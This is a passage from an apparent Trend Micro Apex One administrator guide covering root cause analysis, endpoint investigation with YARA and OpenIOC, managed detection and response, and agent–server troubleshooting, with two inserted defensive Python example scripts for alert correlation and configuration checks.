Analyzer, but is limited to file hash, domain and destination IP address objects.

The Virtual Analyzer Suspicious Objects window allows an administrator to perform an impact
analysis on the network. The impact analysis uses Endpoint Sensor to contact the Agents and performs
a historical scan of their logs to determine whether the suspicious objects have been present in your
environment for a period of time without detection.

In Apex Central, click Threat Intel > Virtual Analyzer Suspicious Objects. Click to select the desired
object and click Analyze Impact.

Root Cause Analysis


Root Cause Analysis is the graphical representation of how the infection and/or suspicious activities
occurred. This is very helpful in tracking down the root cause of the problem, identifying patient zero or
the entry point.

If an assessment returns a match, administrators may generate a root cause analysis to:
• List all related objects to the specified criteria
• Identify if any of the related objects are noteworthy
• Review the sequence of events leading to the execution of the matched object.

Root Cause Analysis provides a forensic picture from the endpoint side of the attack to track down the
root cause of infection and related suspicious/malicious activities. Root Cause Analysis tasks are created
on Apex One Server as an investigation batch. Endpoints poll the Apex One Server every ten minutes for
updates and to collect the batch of investigation tasks. Root Cause Analysis needs one to five minutes to
complete and to upload the results.

Note: Root Cause Analysis is not supported for Mac Security Agents.

To manually generate the Root Cause Analysis, click Response > Preliminary Investigation > Assessment.
Select the required endpoints and click Generate Root Cause Analysis.

Provide a name for the Root Cause Analysis report.

The Root Cause Analysis report will display as processing while the analysis takes place.

In Apex Central, click Response > Preliminary Investigation > Root Cause Analysis Results to view the
results of all automated and manual Root Cause Analysis tasks.

Click the Task Name to view the results of the analysis. The Analysis Chains tab displays the main Root
Cause Analysis information in a graph view.

Details on the graph include:


• Target Endpoint: Displays information about the root cause analysis result and provides the ability
to isolate the endpoint.
• First Observed Object: With built-in intelligence, Endpoint Sensor is able to find the potential
entry point of the root cause chain.
• Matched Objects: Lists all the objects which matched with input criteria.
• Noteworthy Objects: Objects identified as suspicious or malicious will be displayed.

Icons and dots represent each component and their relationships. More information is available for
each object by clicking on it (user, pid, hashes…). The root cause analysis area shows object types
using the following icons (the icon images are not reproduced here):

• First Observed Object: Marks an object that most likely created the matched object
• Matched Criteria: Marks objects matching the investigation criteria
• Normal Object: Marks objects that have been verified to not pose a threat, such as common system
files (icon in black)
• Unrated Object: Marks objects that are not system files but do not exhibit suspicious behavior
(icon in grey)
• Suspicious Object: Marks objects that exhibit behaviors that are similar to known threats (icon in
orange)
• Malicious Object: Marks objects that match a known threat (icon in red)
• Boot: Objects that launch during system startup
• Browser: Objects that are capable of displaying web pages, usually a web browser
• Email: Objects that can send and receive email messages, usually an email client or server
• File name: Objects that are files on the disk
• Network: Objects related to network connections or the Internet
• Process: Objects that are processes running during the time of execution
• Registry: Objects that are registry keys, entries or data
• Event: Indicates actions done by the object
• Association: Indicates relationships between two objects

If a process object is not normal, it can be terminated. If a process life was too short and the hash
couldn’t be calculated, termination won’t be possible.

The Object Details tab displays the same information as Analysis Chains, but in tabular format.

If an object is not normal, its file name, file hash, domain, IP or registry information can be used as
criteria for a Preliminary Investigation (Impact Assessment), and its file hash, domain or IP can be
added as Suspicious Objects.

Both Analysis Chains and Object Details can be exported to *.png or *.csv formats.

Incident Response
The incident response phase allows administrators to mitigate damage from infected endpoints, by
terminating suspicious processes, banning suspicious applications through User Defined Suspicious
Objects or isolating endpoints.

Terminating Suspicious Processes


When you click a process object in the Analysis Chain and its rating is not normal, you can terminate
it remotely. After a certain time, the process will be terminated on the endpoint. Click the process
object in the Analysis Chain graph and click Terminate Object.

Adding Processes to the Suspicious Objects List


A process will no longer be able to execute or be accessed once it has been added to the User-Defined
Suspicious Objects list. The running process will be terminated as well. Click the process object in the
Analysis Chain graph and click Add to Suspicious Object List.

Apex One Application Control must be enabled on the endpoint to block the process by its SHA-1 hash.

Isolating Endpoints
From the Historical Investigation results, one or more endpoints can be isolated from the network
using the Windows Filtering Platform. All communication to and from the endpoint is blocked except
that between the Apex One Server and the Security Agent. Click Response > Historical
Investigation. On the Assessment tab, select the endpoint in question and click Isolate Endpoint.

When the crisis is resolved, restore endpoint connectivity. Click Directories > Users/Endpoints. In the
Endpoints list, click All.

Click the isolated endpoint and click Restore from the Task column.

Isolate Endpoint can be selected from the Root Cause Analysis result window, Detailed Investigation
results and the Endpoint view.

Detailed Investigation
Detailed (also referred to as Real-Time or Live) Investigation is the search process that deals with the
current system state. It scans memory and the disk for specific indicators or examines running processes.
Detailed Investigation is currently not supported on Mac endpoints.

Detailed Investigation methods available include:


• Search memory using YARA files
• Search the hard disk using OpenIOC files
• Search the Windows Registry with custom criteria

Note: Preliminary Assessment is not run live, but runs on metadata submitted to the Apex One Server.
This provides a fast search and works even if endpoint is offline. Detailed Investigation runs on
the endpoint in real time.

Root cause analysis results are only available for YARA rules. Because detailed investigations run on the
current system state, some files and registry entries may be locked or in use during this period. Root
Cause Analysis results are not available for investigations using OpenIOC rules or registry search. To
generate a root cause analysis using OpenIOC rules or registry data, use preliminary investigation.

A Detailed Investigation can be run once or can be scheduled to run regularly using a set of similar
settings. The average Detailed Investigation run time is about 40 minutes (Security Agent polling occurs
every 10 minutes, and the Detailed Investigation task and data upload take about 20 to 30 minutes). The
polling interval can be reduced on the Apex One Server by clicking Agents > Global Agent Settings > Server
Polling Interval.

To begin a Detailed Investigation, click Response > Detailed Investigation.

Click either the One-Time Investigation or Schedule Investigation tab and click New Investigation. Type
a Name, select a Method and click Select Endpoints to identify the endpoints on which to run the
investigation.

Scan Disk Using OpenIOC

This option scans all files currently on the hard disk using OpenIOC 1.0 rules, either imported or
taken from the repository. Click Upload OpenIOC file to import an OpenIOC file acquired from
another source, or click Use Existing OpenIOC file to use a file provided by Trend Micro. Click
Select Endpoint to identify the endpoints on which the investigation will be run.

Only one OpenIOC file can be used by the task, and all conditions within the OpenIOC file will be
handled as OR (any of the criteria).

Click Start Investigation. A progress bar is displayed as the investigation proceeds.

The following indicators of compromise items and conditions are supported for Detailed
Investigations.

Is Contains Starts-with End-with Greater-than Less-than


fileitem/filepath √ √ √ √
fileitem/fullpath √
fileitem/filename √ √ √ √
fileitem/md5sum √
fileitem/sha1sum √
fileitem/sha256sum √
fileitem/sizeinbytes √ √ √
fileitem/created √ √
fileitem/modified √ √
fileitem/accessed √ √

Certain limitations exist for scanning disk files using IOC, including:
• A hash is not generated for files larger than 64 MB
• Large files cannot be checked by hash with OpenIOC
• Timestamps must use the UTC format yyyy-mm-ddThh:mm:ss when checking
Fileitem/Created, Modified or Accessed.
• Apex One can use a maximum of 100 indicator items, with a maximum depth of 50
• A search is limited to 10,000 files
• Searches must be specific (for example, limited to a directory)
• A search returns a maximum of 1000 matched items
• These search limits are independent of the number of endpoints
• Unsupported items and conditions are not used for the investigation task and are
shown with a strikethrough.

All endpoints that matched the OpenIOC file will appear on the Matched tab.

Click the item for further details.

Scan In-Memory Processes Using YARA Rules

This option uses YARA rules to scan all processes currently running in memory. YARA rules
allow running processes to be scanned for identified strings. This can be used in
situations where hash values cannot be used as criteria for an investigation.

YARA rule files can be imported or selected from the repository. Only one YARA file can be used
per task.

YARA rules are the only Detailed Investigation method that provides Root Cause Analysis data.
Because Detailed Investigations run on the current system state, some files and registry entries
may be locked or in use during this period.

All endpoints that match the YARA Rule file will appear on the Matched tab.

Click View in the Root Cause Analysis column to view the Analysis Chain graph.

Search Registry

This method uses manually defined settings to search the Windows Registry in its current state.
Define criteria with a key (path), (key) name and value. Multiple items can be set and will be
handled as an OR operation.

Registry root keys available for live scanning include:


• HKEY_CURRENT_USER
• HKEY_CLASSES_ROOT
• HKEY_LOCAL_MACHINE
• HKEY_USERS

Note: The HKEY_CURRENT_CONFIG root key cannot be scanned.

All endpoints that match the Registry criteria will appear on the Matched tab.

Viewing Detailed Investigation Results

Investigation results are displayed in the Detailed Investigation window. Previous results are
retained for the time period allowed by the software license. Tasks can be stopped (while
processing) or deleted.

Attack Discovery
Attack Discovery uses an Indicator of Attack-based detection engine. This mechanism focuses on the
detection of the intent of what an attacker is trying to accomplish, regardless of the malware or exploit
used in an attack.

Attack Discovery behavior is based on the configured Attack Discovery Engine (ADE) rules. The Attack
Discovery Engine detection log can be a starting point for an investigation.

Viewing the Attack Discovery Engine Log


In Apex Central, click Detections > Logs > Log Query. Select Attack Discovery Detections from the
list.


Managed Detection and Response


Despite putting sophisticated threat detection techniques in place, there are still some advanced
targeted attacks that can bypass traditional defenses.

Some of the approaches used to detect these advanced threats include:


• Network Discovery: Products like Deep Discovery Inspector are available to monitor the network
on multiple protocols looking for Command & Control behavior and detecting lateral movement
of threats. These tools also incorporate virtual sandboxing technology for definitive
identification of advanced threats.
Network Discovery tools can sometimes be very complex to work with, and can generate a large
number of alerts which could require investigation. Also, network tools can't identify threats at
the point of entry.
• Endpoint Detection and Response: Detailed system activity can be recorded on the endpoint and
threat investigators can query the endpoint searching for Indicators of Attack (IOA) or Indicators
of Compromise (IOC). Advanced detection techniques implemented on the endpoint computer
such as behavior analysis and predictive machine learning can identify emerging or unknown
threats.

These approaches require well-trained researchers with strong skills to deconstruct the attack and
identify the correct indicators of attack. This investigation process can be very complex, time-consuming
and expensive. A large number of alerts detected on the network and endpoints can lead to alert fatigue,
and important details can be overlooked in the rush to investigate every activity that is occurring. The
number of endpoints that need to be dealt with, including servers, endpoint computers and IoT devices,
further complicates the process. Once the threats have been identified, a mitigation plan must be
devised and implemented to protect the environment from any further attack. And finally, a skills shortage
in the industry can make it difficult for organizations to recruit researchers with the appropriate skill set.

All of this drives the need for a managed detection and response solution.

Trend Micro Managed Detection and Response Service


Trend Micro has introduced a new line of attack to deal with advanced threat detection and
mitigation through its Managed Detection and Response Service.

Advanced automation mechanisms available through Trend Micro's Security Operation Centers (SOC)
can assist in correlating all alerts coming into customers' systems and prioritizing them.
Advanced Artificial Intelligence (AI) techniques can help reduce the number of manual investigations
required to develop an appropriate mitigation scheme.


Once the prioritized list of alerts has been compiled, Trend Micro staff in the Security Operation
Centers will be able to assist organizations that don't have incident response staff to complete a
detailed investigation of the threat and provide the steps needed to deal with it.

[Figure: the three phases of the Managed Detection and Response Service]

Detection: Automated prioritization; Automatic sweeping; Threat hunting
Analysis: SOC personnel investigate; Validate alerts; Detailed threat analysis and impact
Response: Alert and advise; Root cause analysis; Mitigation recommendations or toolkits

The Trend Micro Managed Detection and Response Service includes three components:
• Detection: Since the Security Operation Center has the ability to correlate threats and events
occurring on the network with threats occurring on the endpoint, they can get a better view into
the advanced threats penetrating the organization and improve the detection of these threats.
In addition, if Trend Micro obtains Indicator of Compromise information from a detected threat
on another customer or from a third party, Trend Micro can sweep across all of the customer's
devices as well as all other Managed Detection and Response Service customers to ensure that
none of the indicators are in place.
• Analysis: Trend Micro Security Operation Center personnel will investigate and perform a deep
dive to validate alerts, build a detailed threat analysis and create an impact report including a
root cause analysis to identify how threats got into the network, where they first manifested
themselves, how the threats may have changed over time, how they spread through the network
and how many users may be affected.
• Response: Security analysts in the Security Operation Center generate a report based on the
root cause analysis, and provide a mitigation plan which includes recommendations on how to
clean the affected devices, and in some cases, provide the damage cleanup tools that can assist
in the process.


Service Components
The Trend Micro Managed Detection and Response Service is made up of three components.

[Figure: components of the Managed Detection and Response Service]

Sensors: Integrated Endpoint Protection; Deep Discovery Inspector; Deep Security
Threat Investigation Centre: Threat intelligence, expert rules and machine learning; Trend Micro Analysts
Response: Delivered to the Apex Central Web Management console

• Sensors: Customers put the appropriate sensors in place to record system behavior and
activities and forward metadata about these activities to the service. On the endpoint
computer, Trend Micro Endpoint Sensor and Apex One will be used. Deep Discovery
Inspector on the network will record similar metadata and send it to the service, and Deep
Security will do the same for servers.
• Threat Investigation Center: The Threat Investigation Center at a centrally managed
Trend Micro Security Operation Center will take advantage of Trend Micro threat
intelligence information, rules, machine learning, and artificial intelligence to correlate what
is happening on an endpoint with what is happening on the network to identify prioritized
alert situations.
• Response: Trend Micro analysts examine the alert details, perform a deep investigation and
provide a response directly to Apex Central with the full plan to mitigate against the attack.

Managed Detection and Response Service Flow


As an example, a user downloads an infected file that was able to take over a remote PC through a
PowerShell script and compromise an IoT device.

Protection on the Endpoint identifies that this end user has been compromised. At the same time,
Deep Discovery Inspector identifies Command & Control behavior. Taking these two events together,
if the infected PC attempts to access that C&C server, a correlation can be established and a bigger
picture around the advanced attack can be drawn.

Advanced detection techniques identify the relationship between the alerts and prioritize this as
something worth investigating. An alert can be forwarded to the end user asking for approval to
proceed with the investigation, and the analysts perform an impact analysis.

The Trend Micro analysts identify the threat, identify the risk and impact, identify if anything else
was downloaded and determine whether that target has been breached. The analyst proceeds with a
root cause analysis that allows them to understand the story of the attack and develop a plan to
mitigate it.
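The endpoint-plus-network correlation described in this flow, as an added example (not Trend Micro's code or the Threat Investigation Center's logic): an endpoint compromise detection and a Deep Discovery Inspector C&C detection for the same host within a time window are joined into one high-priority incident, while hosts with only one kind of evidence are kept at medium priority. The alert records, field names and the 30-minute window are constructed for this example.

```python
from collections import defaultdict
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import Dict, List


@dataclass
class Alert:
    """One detection as the service would receive it (constructed schema)."""
    source: str          # "endpoint" (Apex One) or "network" (Deep Discovery Inspector)
    kind: str            # "compromise" for an endpoint detection, "cnc" for C&C traffic
    host_ip: str         # the endpoint's IP; DDI reports the internal source of the traffic
    timestamp: datetime
    detail: str


@dataclass
class Incident:
    host_ip: str
    priority: str                     # "high" when endpoint and network evidence line up
    alerts: List[Alert] = field(default_factory=list)


def correlate(alerts: List[Alert], window: timedelta = timedelta(minutes=30)) -> List[Incident]:
    """Group alerts per host and raise the priority when an endpoint compromise
    and C&C traffic from the same host fall within `window` of each other.

    Hosts with only one kind of evidence still become incidents, but at
    medium priority, so nothing is silently dropped. The result is ordered
    high priority first, then by the time of the earliest alert.
    """
    by_host: Dict[str, List[Alert]] = defaultdict(list)
    for alert in alerts:
        by_host[alert.host_ip].append(alert)

    incidents: List[Incident] = []
    for host_ip, host_alerts in by_host.items():
        host_alerts.sort(key=lambda a: a.timestamp)
        endpoint_hits = [a for a in host_alerts if a.source == "endpoint" and a.kind == "compromise"]
        cnc_hits = [a for a in host_alerts if a.source == "network" and a.kind == "cnc"]
        # The pattern from the flow above: the infected PC is flagged by the endpoint
        # agent and is also seen talking to a C&C server on the network.
        linked = any(abs(c.timestamp - e.timestamp) <= window
                     for e in endpoint_hits for c in cnc_hits)
        incidents.append(Incident(host_ip, "high" if linked else "medium", host_alerts))

    rank = {"high": 0, "medium": 1}
    incidents.sort(key=lambda i: (rank[i.priority], i.alerts[0].timestamp))
    return incidents


def summarize(incidents: List[Incident]) -> List[str]:
    """One line per incident, suitable for a prioritized review queue."""
    lines = []
    for inc in incidents:
        sources = sorted({a.source for a in inc.alerts})
        lines.append(f"{inc.priority.upper():6} {inc.host_ip:12} "
                     f"{len(inc.alerts)} alert(s) from {'+'.join(sources)}")
    return lines


# Constructed sample alerts: 10.0.0.5 matches the flow above (endpoint detection
# followed by C&C traffic 12 minutes later); 10.0.0.7 has endpoint evidence only;
# 10.0.0.9 has both, but hours apart, so they are not linked.
T0 = datetime(2019, 7, 29, 9, 0)
SAMPLE_ALERTS = [
    Alert("endpoint", "compromise", "10.0.0.5", T0, "malicious PowerShell script blocked"),
    Alert("network", "cnc", "10.0.0.5", T0 + timedelta(minutes=12), "C&C callback detected"),
    Alert("endpoint", "compromise", "10.0.0.7", T0 + timedelta(minutes=30), "trojan quarantined"),
    Alert("network", "cnc", "10.0.0.9", T0 - timedelta(hours=1), "C&C callback detected"),
    Alert("endpoint", "compromise", "10.0.0.9", T0 + timedelta(hours=2), "trojan quarantined"),
]

if __name__ == "__main__":
    for line in summarize(correlate(SAMPLE_ALERTS)):
        print(line)
```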


A report is compiled to provide all the information about the attack, recommendations on how to
mitigate the threat and, in some cases, which tools can be provided to deal with its remediation.

The end customer is then responsible for the threat remediation, which can include killing certain
processes, re-imaging the endpoint, or implementing a pattern update.

The Threat Investigation Center will then build an Indicator of Compromise that will allow them to
easily repeat the identification of the threat and continually monitor for the same type of attack in the
same customer's environment and on other Managed Detection and Response Service customers.

Customers are provided with a full report on each incident that details the response and remediation
of the threat. Monthly and quarterly reports are also provided to the organization's management to
reaffirm the value provided through the service and provide specific actions and recommendations
to improve their security posture.

Managed Detection and Response Service focuses on Detection, Analysis and Response; the
customer or partner is responsible for Remediation.

[Figure: Compromise → Detection → Analysis → Respond → Remediate; the Managed Detection and Response Service covers Detection, Analysis and Respond]

Configuring Apex Central for Managed Detection and Response Service

When a customer subscribes to the Managed Detection and Response service from Trend Micro, the
details of the Threat Investigation Centre and the organization's unique ID must be provided.
1 Open the Apex Central Web Management console, and click Response > Managed Detection and
Response.


2 Click the Settings tab and complete the details:

• Server address: Type the HTTPS log server address of Threat Investigation Center, as
provided by Trend Micro
• Company GUID: Type your unique company ID, as provided by Trend Micro
• Task approval: Enable this setting to allow the Trend Micro Threat Investigation Center to
initiate investigations without requiring approval from the customer
• Notification recipients: If automatic approval for investigations is not enabled, identify the
users or groups to be queried for approval to allow the Trend Micro Threat Investigation
Center to proceed with the investigation
Click Register.

Note: Apex Central sends detections to the Threat Investigation Center every 5 minutes.



Appendix A: Troubleshooting Trend Micro Apex One

This Appendix details some tips and methods for troubleshooting various Apex One components.

Debugging Security Agents


Enabling debug functions on the Security Agent allows an administrator to analyze many aspects of an
Agent's operation. To enable debug logging on a Security Agent, perform the following steps:
1 Create and save a file called ofcdebug.ini in the Security Agent folder with the following
entries:

[debug]
DebugLevel=9
DebugLog=<name and file path for the debug log>
debugLevel_new=D
debugSplitSize=104857600
debugSplitPeriod=24
debugRemoveAfterSplit=1

DebugLevel ranges from 1 (less detailed) to 9 (most detailed).

Note: The debugLevel_new, debugSplitSize, debugSplitPeriod, and debugRemoveAfterSplit entries
instruct Apex One to split the debug files into smaller files.

2 Locate and double-click Logserver.exe in the Agent folder. This will start the debug logging.
3 After running for a period of time, open the log file to view details.
4 Close Logserver.exe and delete ofcdebug.ini to disable debugging.

Debugging the Apex One Server


Enabling debug functions on the Apex One Server allows an administrator to analyze many aspects of the
Apex One Server’s operation. To enable debug logging on the Apex One Server, perform the following
steps.
1 Log into the Apex One Web Management console with the appropriate administrative credentials.


2 Hover the cursor over the A in Apex One on the title banner of the console and click it.
3 The Debug Log Setting window is displayed.
4 Specify the log settings required and click Save.


5 Locate the log file called ofcdebug.log in the following folder:

...\PCCSRV\Log
6 Disable logging after the issue has been resolved.

Changing the Security Agent Communication Port


It might be necessary to change the Security Agent communication port as part of troubleshooting, or
after upgrading or migrating the Apex One Server.

On the Security Agent


1 Copy the IpXfer.exe file from the following folder on the Apex One Server onto the Security
Agent:

C:\Program Files (x86)\Trend Micro\Apex One\PCCSRV\Admin\Utility\IpXfer\
2 On the Security Agent, open a Windows Command Prompt. Navigate to the folder where the
ipxfer.exe file was placed and execute the following command:

ipxfer.exe -s <server_name> -sp 443 -c <agent_port> -pwd <password>

Note: Use ipxfer_x64.exe on 64-bit systems.


Troubleshooting Agent/Server Communication Issues


Certain conditions may prevent the Agent tree from displaying the correct Agent connection status. For
example, if the endpoint computer is physically disconnected from the network, the Agent will not be able
to notify the Server that it is now offline and will incorrectly display as online. The Agent-Server
connection can be verified manually, or Apex One can perform a scheduled verification.

Verify the Connection Status Manually


To verify the connection status manually, click Agents > Connection Verification. On the Manual
Verification tab, click Verify Now.

Verify the Connection Status Automatically


To verify the connection status automatically, click Agents > Connection Verification. On the
Scheduled Verification tab configure the scheduled verification.


Verify the Results of the Connection Status


Apex One creates a log entry each time the Agent/Server connection is checked. To check the logs,
click Logs > Agents > Connection Verification Logs. Check the Status column for the results of the
connection test.

Troubleshooting Communication Issues Between Security Agent and Server

There are several potential causes for connection issues. Some of the remedies include:
• Verifying if the Server can ping the Agent, and vice versa.
• Checking if the Server can telnet to the Agent using the Agent communication port.
• Checking if the Agent can telnet to the Server using the Server communication port (default is
8080 for Apex One).
• Verifying if the Agent can resolve the Server's hostname.
• Opening a browser on the Agent and typing the following address:

http://<servername>:<port>/officescan

Verify Security Agent Registry settings


In some cases the Agent Registry settings may be incorrect. Perform the following steps to confirm
the settings:
1 On the Server machine, open the ofcscan.ini file in a text editor.
2 Note the values of the following parameters:

Master_DomainName
Master_DomainPort
Master_SSLPort
Client_LocalServer_Port
3 Open the Registry Editor on the Agent computer.
4 Open the following registry hive (for 64-bit machines):

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TrendMicro\PC-cillinNTCorp\
CurrentVersion
5 Check the values of the following registry keys and modify as necessary:

LocalServerPort must have the same value as Client_LocalServer_Port
Server must have the same value as Master_DomainName
ServerPort must have the same value as Master_DomainPort
ServerSSLPort must have the same value as Master_SSLPort
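The comparison in steps 2 to 5, as an added script (not Trend Micro's code): it pulls the four parameters out of ofcscan.ini, reads the four registry values from the agent key named in step 4 when run on Windows, and reports every pair that disagrees or is missing. The ofcscan.ini text and the registry snapshot embedded below are constructed sample data; the ini section name in the sample is an assumption, and the parser ignores section names.

```python
import sys
from typing import Dict, List, Optional, Tuple

# Registry value name -> ofcscan.ini parameter it must equal (the pairs from step 5).
EXPECTED = {
    "LocalServerPort": "Client_LocalServer_Port",
    "Server": "Master_DomainName",
    "ServerPort": "Master_DomainPort",
    "ServerSSLPort": "Master_SSLPort",
}

# Agent key under HKEY_LOCAL_MACHINE on 64-bit machines (step 4).
AGENT_KEY = r"SOFTWARE\WOW6432Node\TrendMicro\PC-cillinNTCorp\CurrentVersion"


def parse_ofcscan_ini(text: str) -> Dict[str, str]:
    """Return the parameters named in EXPECTED from ofcscan.ini text.

    Section headers and ';' / '#' comment lines are skipped, so the parameters
    are found wherever they sit; the first occurrence of each name wins.
    """
    wanted = set(EXPECTED.values())
    found: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#[":
            continue
        name, sep, value = line.partition("=")
        name = name.strip()
        if sep and name in wanted and name not in found:
            found[name] = value.strip()
    return found


def read_agent_registry() -> Dict[str, str]:
    """Read the four values from the live agent key (Windows only).

    Uses the standard winreg module; REG_DWORD data comes back as an int and
    is stored as its decimal string so it compares like an ini value.
    """
    import winreg  # standard library, present only on Windows
    values: Dict[str, str] = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, AGENT_KEY) as key:
        for name in EXPECTED:
            try:
                data, _kind = winreg.QueryValueEx(key, name)
            except FileNotFoundError:
                continue          # reported as missing by find_mismatches
            values[name] = str(data)
    return values


def _equivalent(reg_value: str, ini_value: str) -> bool:
    """Ports compare numerically (so 08080 equals 8080); names compare case-insensitively."""
    if reg_value.isdigit() and ini_value.isdigit():
        return int(reg_value) == int(ini_value)
    return reg_value.strip().lower() == ini_value.strip().lower()


def find_mismatches(registry: Dict[str, str], ini: Dict[str, str]
                    ) -> List[Tuple[str, Optional[str], str, Optional[str]]]:
    """Return (registry_name, registry_value, ini_name, ini_value) for each pair
    that disagrees or is missing on either side; an empty list means all four match."""
    problems = []
    for reg_name, ini_name in EXPECTED.items():
        reg_value, ini_value = registry.get(reg_name), ini.get(ini_name)
        if reg_value is None or ini_value is None or not _equivalent(reg_value, ini_value):
            problems.append((reg_name, reg_value, ini_name, ini_value))
    return problems


# Constructed sample data: the ini and registry agree on everything except
# ServerPort, and the server name differs only in letter case (still a match).
SAMPLE_OFCSCAN_INI = """\
; constructed sample, not a real ofcscan.ini
[INI_SERVER_SECTION]
Master_DomainName=apexone.example.local
Master_DomainPort=8080
Master_SSLPort=4343
Client_LocalServer_Port=21112
"""
SAMPLE_AGENT_REGISTRY = {
    "LocalServerPort": "21112",
    "Server": "APEXONE.example.local",
    "ServerPort": "8081",      # wrong: the sample ofcscan.ini says 8080
    "ServerSSLPort": "4343",
}

if __name__ == "__main__":
    # Pass the path of a copy of the server's ofcscan.ini to check the live agent
    # registry on Windows; with no argument the constructed sample data is used.
    if len(sys.argv) > 1 and sys.platform == "win32":
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            ini, registry = parse_ofcscan_ini(fh.read()), read_agent_registry()
    else:
        ini, registry = parse_ofcscan_ini(SAMPLE_OFCSCAN_INI), SAMPLE_AGENT_REGISTRY
    for reg_name, reg_value, ini_name, ini_value in find_mismatches(registry, ini):
        print(f"MISMATCH {reg_name}={reg_value!r} but {ini_name}={ini_value!r}")
```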

Confirm Correct Product Licensing


Invalid licensing of server and desktop components could create communication problems. From the
Apex One Web Management console, go to Administration > Settings > Product License and verify
that the licensing status displays as Activated.

Verify Agent Privileges to Communicate With the Server


In some cases, the Agent may not have sufficient privileges to communicate with the Server. To
verify, perform the following steps:
1 On the Apex One Server, open Windows Command Prompt.
2 Navigate to the ...\PCCSRV folder and run the following commands:

svrsvcsetup -setvirdir
svrsvcsetup -setprivilege

If you are using SSL, run the following command:

svrsvcsetup -enablessl

Verify Internet Information Services


In some cases the Internet Information Services (IIS) settings may be incorrect. To verify, perform the
following steps.
1 Open the Internet Information Services Manager then expand <server name> > Sites >
OfficeScan.
2 In the middle pane, double-click Authentication.
3 Ensure that Anonymous access is enabled.

4 Click Edit in the Actions frame and ensure that anonymous authentication is using the IUSR
user.

Re-establish Communication Using autopcc.exe


Autopcc.exe can be used to re-establish connection between the Agent and Server. To force an
update of the Security Agent and a reconnection, perform the following steps.
1 In Windows, click Start > Run and enter the following command:

\\<Apex_One_Server_name_or_IP_address>\ofcscan\autopcc.exe -f -u


2 Open the Apex One Web Management console, and verify if the Security Agent now appears
correctly.

Re-establish Communication Using IpXfer.exe


Alternately, IpXfer.exe can be used to re-establish connection between the Security Agent and
Apex One Server. To attempt a reconnection, perform the following steps:
1 On the Apex One Server, open the ...\PCCSRV\ofcscan.ini file in a text editor.
2 Note the values of the following parameters:

Master_DomainName

Master_SSLPort

Client_LocalServer_SSLPort
3 Copy the ...\PCCSRV\Admin\Utility\IpXfer\IpXfer.exe file to the Security Agent
folder on the Agent endpoint computer.
4 On the Agent computer, open Windows Command Prompt window and navigate to the Security
Agent folder and run the following command:

IpXfer.exe -s <value_of_Master_DomainName> -p <value_of_Master_SSLPort> -c <value_of_Client_LocalServer_SSLPort>
5 Open the Web Management console then verify if the Security Agent now appears correctly.

Verify Windows Firewall Blocking


In some cases, the Windows Firewall may be blocking communication ports. To open the necessary
ports, perform the following steps.
1 On the Apex One Server computer, open the ...\PCCSRV\ofcscan.ini file in a text editor.
2 Note the values of the following parameters:

Master_SSLPort

Client_LocalServer_SSLPort
3 On the Agent machine, open Control Panel > Windows Firewall.
4 Click the Exceptions tab and click Add Port.
5 Enter the values of the Master_SSLPort and Client_LocalServer_SSLPort using TCP.
6 Restart the Apex One NT Listener service.
7 Clear Internet Explorer temporary Internet files, offline content, and cookies.
8 Open the Web Management console and verify if the Agent now appears correctly.


Change the Agent Domain


Changing the Agent domain may sometimes resolve communication issues. To change the Agent
domain, perform the following steps.
1 Open the Apex One Web Management console and navigate to Agents > Agent Management.
2 Click Manage Agent Tree > Add Domain.
3 Type a name for the domain, and click OK.
4 Drag the Agent that has an offline or disconnected status to the new domain.
5 On that Security Agent endpoint, restart the Apex One NT Listener service.
6 Right-click the Apex One icon on the system tray then click Update Now.
7 Refresh the Web Management console then verify if the Agent now appears correctly.

Verify Server Hostname Resolution


If the Security Agent is unable to resolve the Apex One Server hostname to an IP address,
communication issues may be encountered. To verify name resolution, perform the following steps.
1 On the Server machine, open the ...\PCCSRV\ofcscan.ini file in a text editor.
2 Note the values of the following parameters:

Master_DomainName

Master_SSLPort
3 On the Agent computer, open a browser and type the following address:

https://<value_of_Master_DomainName>:<value_of_Master_SSLPort>/officescan/cgi/cgionstart.exe
4 If the page displays -2, the client can communicate with the server.

Troubleshooting Virus Infection


To better help administrators analyze the source of malware and spyware, they can verify the infection
channel. This data exists in the real time scan logs for virus and spyware on both agents and servers, and
can help administrators trace how users were infected by the malware or spyware.


Determining the Virus Infection Channel on the Server


The Virus/Malware Logs displayed in the Web Management console include an Infection Channel
column.

Determining the Virus Infection Channel on the Agent


On the Security Agent, the Infection Channel details exist in the Log Details.


Determining Spyware/Grayware Infection Channel on the Server


In the Spyware/Grayware Log Details, the Infection Channel is displayed in the Spyware Components
section.

Determining Spyware/Grayware Infection Channel on the Agent


On the Agent, the Infection Channel details exist in the Log Details.


Troubleshooting the Firewall Service


Consider the following to help troubleshoot firewall-related issues:
• Verify that the protocol is supported. In Apex One, only the TCP, UDP and ICMP protocols are supported.
• Dump the rules using the tmpfw dump command and verify the rules in the !Pfwdump.txt file.

Troubleshooting the Unauthorized Change Prevention Service

To enable debug logs for this service, perform the following steps.
1 Add the following Registry entry on the Security Agent host, and restart the service:

Key: HKLM\Software\TrendMicro\AEGIS
Value: DebugLogFlags
Data: 0x00000032
Type: REG_DWORD

Logs will be placed in:

...\BM\Log: TmCommengyyyymmdd_nn.log and TMPEMyyyymmdd_nn.log
...\Security Agent\Log: TMBMCliyyyymmdd_nn.log


Troubleshooting Edge Relay Server Certificates


The Apex One Edge Relay Server uses digital certificates to secure communication between Agents, the
Relay Server and Apex One Server. If communication issues arise, verify the following.
• Verify that the Web Server certificate (OscePA) installed in the Trusted Root Certification Authorities
store is signed by OsceEdgeRoot
• Verify the certificate used by the Data Service

Troubleshooting Sample Submission


To troubleshoot issues related to malware sample submission to a Deep Discovery Analyzer device,
consider the following:
• Verify that the Apex One Server and Deep Discovery Analyzer have been registered in Apex
Central and the devices are not listed in the New Entity folder


• Verify that Apex One is subscribed to the Suspicious Object List

• Verify that the Sample Submission Settings are enabled for the Security Agent.

• Verify that the sample gets uploaded from the Agent to the Apex One Server by locating the
sample in the following folder shortly after detection, but before processing by the Deep
Discovery Analyzer:

...\TEMP\Sample Submission



Appendix A: What’s New in Trend Micro
Apex One
Trend Micro OfficeScan has evolved into Trend Micro Apex One. As an upgrade to OfficeScan, Apex One
introduces new functionality to endpoint protection. Some of the new features introduced in Apex One
are described here.

All-in-one Security Agent


